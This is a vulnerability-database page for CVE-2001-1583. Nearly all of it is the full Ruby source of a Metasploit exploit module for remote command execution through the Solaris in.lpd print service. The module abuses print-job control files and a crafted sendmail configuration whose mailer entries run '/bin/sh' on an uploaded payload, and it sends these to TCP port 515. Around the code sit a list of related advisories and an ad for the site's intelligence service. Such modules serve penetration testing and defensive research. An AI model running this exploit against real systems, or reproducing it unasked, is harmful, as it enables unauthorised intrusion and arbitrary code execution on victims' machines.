Lucene search

Solaris LPD - Command Execution (Metasploit)

🗓️ 20 Sep 2010 00:00:00Reported by MetasploitType

Solaris LPD Command Execution in.lpd service allows arbitrary command execution up to Solaris 8.0. Exploits technique by Dino Dai Zovi

Reporter	Title	Published	Views	Family All 8
Exploit DB	Solaris 8.0 LPD - Command Execution (Metasploit)	31 Aug 200100:00	–	exploitdb
canvas	Immunity Canvas: IN_LPD	31 Dec 200105:00	–	canvas
Packet Storm	Solaris LPD Command Execution	28 Oct 200900:00	–	packetstorm
Metasploit	Solaris LPD Command Execution	16 Jan 200602:59	–	metasploit
Tenable Nessus	Solaris in.lpd Crafted Job Request Arbitrary Remote Command Execution	3 Apr 200300:00	–	nessus
Cvelist	CVE-2001-1583	23 Sep 200723:00	–	cvelist
CVE	CVE-2001-1583	23 Sep 200723:00	–	cve
NVD	CVE-2001-1583	31 Dec 200105:00	–	nvd

##
# $Id: sendmail_exec.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Solaris LPD Command Execution',
			'Description'    => %q{
					This module exploits an arbitrary command execution flaw in
				the in.lpd service shipped with all versions of Sun Solaris
				up to and including 8.0. This module uses a technique
				discovered by Dino Dai Zovi to exploit the flaw without
				needing to know the resolved name of the attacking system.
			},
			'Author'         => [ 'hdm', 'ddz' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					[ 'CVE', '2001-1583'],
					[ 'OSVDB', '15131'],
					[ 'BID', '3274'],
				],
			'Platform'       => ['unix', 'solaris'],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space'       => 8192,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},
			'Targets'        =>
				[
					[ 'Automatic Target', { }]
				],
			'DisclosureDate' => 'Aug 31 2001',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(515)
			], self.class)
	end

	def exploit

		# This is the temporary path created in the spool directory
		spath = "/var/spool/print"

		# The job ID is squashed down to three decimal digits
		jid   = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]

		# The control file
		control =
			"H"+"metasploit\n"+
			"P"+"\\\"-C"+spath+"/"+jid+"mail.cf\\\" nobody\n"+
			"f"+"dfA"+jid+"config\n"+
			"f"+"dfA"+jid+"script\n"


		# The mail configuration file
		mailcf =
			"V8\n"+
			"\n"+
			"Ou0\n"+
			"Og0\n"+
			"OL0\n"+
			"Oeq\n"+
			"OQX/tmp\n"+
			"\n"+
			"FX|/bin/sh #{spath}/#{jid}script\n"+
			"\n"+
			"S3\n"+
			"S0\n"+
			"R\+     #local \\@blah :blah\n"+
			"S1\n"+
			"S2\n"+
			"S4\n"+
			"S5\n"+
			"\n"+
			"Mlocal  P=/bin/sh, J=S, S=0, R=0, A=sh #{spath}/#{jid}script\n"+
			"Mprog   P=/bin/sh, J=S, S=0, R=0, A=sh #{spath}/#{jid}script\n"

		# Establish the first connection to the server
		sock1 = connect(false)

		# Request a cascaded job
		sock1.put("\x02metasploit:framework\n")
		res = sock1.get_once
		if (not res)
			print_status("The target did not accept our job request command")
			return
		end

		print_status("Configuring the spool directory...")
		if !(
				send_file(sock1, 2, "cfA" + jid + "metasploit", control) and
				send_file(sock1, 3, jid + "mail.cf", mailcf) and
				send_file(sock1, 3, jid + "script", payload.encoded)
			)
			sock1.close
			return
		end

		# Establish the second connection to the server
		sock2 = connect(false)

		# Request another cascaded job
		sock2.put("\x02localhost:metasploit\n")
		res = sock2.get_once
		if (not res)
			print_status("The target did not accept our second job request command")
			return
		end

		print_status("Attempting to trigger the vulnerable call to the mail program...")
		if !(
				send_file(sock2, 2, "cfA" + jid + "metasploit", control) and
				send_file(sock2, 3, "dfa" + jid + "config", mailcf)
			)
			sock1.close
			sock2.close
			return
		end

		sock1.close
		sock2.close

		print_status("Waiting up to 60 seconds for the payload to execute...")
		select(nil,nil,nil,60)

		handler
	end

	def send_file(s, type, name, data='')

		s.put(type.chr + data.length.to_s + " " + name + "\n")
		res = s.get_once(1)
		if !(res and res[0,1] == "\x00")
			print_status("The target did not accept our control file command (#{name})")
			return
		end

		s.put(data)
		s.put("\x00")
		res = s.get_once(1)
		if !(res and res[0,1] == "\x00")
			print_status("The target did not accept our control file data (#{name})")
			return
		end

		print_status(sprintf("     Uploaded %.4d bytes >> #{name}", data.length))
		return true
	end

end

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

20 Sep 2010 00:00Current

6.7Medium risk

Vulners AI Score6.7

CVSS210

EPSS0.40886